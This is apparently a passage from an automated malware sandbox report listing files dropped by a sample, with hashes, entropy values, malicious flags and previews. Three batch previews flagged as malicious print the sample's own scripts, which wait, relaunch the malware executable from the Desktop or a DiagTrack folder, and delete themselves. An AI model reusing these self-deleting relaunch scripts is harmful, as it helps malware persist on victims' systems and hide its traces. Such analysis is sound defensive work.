                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1510207563435464
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulBkXj:NllUS
                                                                          MD5:453075887941F85A80949CDBA8D49A8B
                                                                          SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                          SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                          SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........

                                                                          C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):5.282632158306158
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DEi0ljuE+CDMdLvKOZG1wkn23fxkVn:HTg9uYDEi0ljwCDMdLDfqV
                                                                          MD5:E63E131BB5202EA51327292E8205EAB4
                                                                          SHA1:064D15722E4DB5A83DD55E6BE24E69BE765AE326
                                                                          SHA-256:6B0FBC77E21ED2FFF8AC8C67E2C6858367C365EE786660653AD6F9673CC8EF6C
                                                                          SHA-512:4E685CB38D58A2FACD023475B26B4B33EC5C0D7F4404DC9CB91BCA1F17F1709F652AA8F7D271DDC9F912E7FEBA55689FC65CBD8BE9D0F7CBF6C726E415412932
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6jqn6DqxiC.bat"

                                                                          C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):5.207776732734312
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+WfW1JyzkAHyBktKcKZG1t+kiE2J5xAISRHn:hCRLuVFOOr+DE1wv+VyKOZG1wkn23fuH
                                                                          MD5:15CAD62CDB72D33A5AE885579EEE6354
                                                                          SHA1:1467E63EC79E6E5582F00077C39070C9CECED7B7
                                                                          SHA-256:78B80C9866FCC9A801E842AFB341E4233B8BB22B6C3E3F46269CDFC0807C3E57
                                                                          SHA-512:D9D297B3CA37E1D4C3E2C8BFFF54C5FC05F117045C5576F947266E2E205BEA2ABD421922D25E4BEEACACE87CA4AC3BB1612C9E77D781130C19CE5A8658FABE93
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GogtzRNUlL.bat"

                                                                          C:\Users\user\AppData\Local\Temp\QqKaK8MzOz

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.373660689688185
                                                                          Encrypted:false
                                                                          SSDEEP:3:VXXXVd5:VnFd5
                                                                          MD5:B13523CBB85A5644874AD912D9D2067A
                                                                          SHA1:0DDEEF070EBBB972CBD7441DECDF97EC17F482E3
                                                                          SHA-256:1C405BF34B045CD5B0C14332297A8CB6132861E5F6567C6961593429619E0607
                                                                          SHA-512:051BE495219AB018515D5A037C02059E8673D8346296A37F9E7196CA9EC4358356297135F1EAD06DBAB3C092DA236FDF416BE46C795ABD766C009608768B8DF3
                                                                          Malicious:false
                                                                          Preview:SQLQOGFf4JCQuBp2g1IzMpxRl

                                                                          C:\Users\user\AppData\Local\Temp\RESEC13.tmp

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Jan 8 19:28:57 2025, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1952
                                                                          Entropy (8bit):4.552578251522025
                                                                          Encrypted:false
                                                                          SSDEEP:24:HqbW96XOvmDDfH9wKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:DvO+KhmMluOulajfqXSfbNtmh5Z
                                                                          MD5:2A2672112434559262D9CCE74B20E5BC
                                                                          SHA1:BB74E07ABC5F800BB8EDBA3F0812B60F9FE05B45
                                                                          SHA-256:FE028769863DC19BDB2662746571A3C65240312602D8FFB6622FB433368C6302
                                                                          SHA-512:470575719B4490FCDF995632727D70E2F9E2597B41D8E62060E12FA77A9D63493A44070D53DBA73841DD26492E805CC5335E3769A7D337D2866CDAC3D77428AA
                                                                          Malicious:false
                                                                          Preview:L.....~g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESEC13.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                          C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):213
                                                                          Entropy (8bit):5.175394329818631
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DE1wv+VyKOZG1wkn23fbwHn:HTg9uYDEmtfAn
                                                                          MD5:0AD902B0A871B3550A3E4E37B585A9B9
                                                                          SHA1:C974D6F07002216384306EC21E4C3DDACEB307E0
                                                                          SHA-256:C589B6EDB9D2BBC8607F7C222AB6888F4B3A0F3CEB3A88934C8E85D38E143873
                                                                          SHA-512:AF15139BDDEA7CA14263720318106805BBEE0329DEB331C46F638D631E1E7C59AEF40B26B158EB0DBCD5B94669663C266B262744AD68617639F89CD3E5DE871E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\U9jP4iZUUm.bat"

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zi5mtx3.4ik.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24tqu211.mzj.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25rnjmgp.53m.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adwc1klp.lt3.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ainkmxgx.xgr.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmpxrwg4.zwp.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsqzgjqi.xid.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfb3bjdr.3fa.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itd1eq5s.u41.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtcxlqrg.m01.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqx2jdqs.0iz.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1odf2ok.1yh.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmvzdmk5.j4s.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdeugyuh.zdp.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rguo3ktb.w2s.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3fjhunv.3nn.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taxdpqnd.rb5.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umkm3ca0.o5z.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrovilh5.nyp.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xo5niaom.m0d.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx42044y.tuc.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypy0421q.kyh.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zor5dmku.uco.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
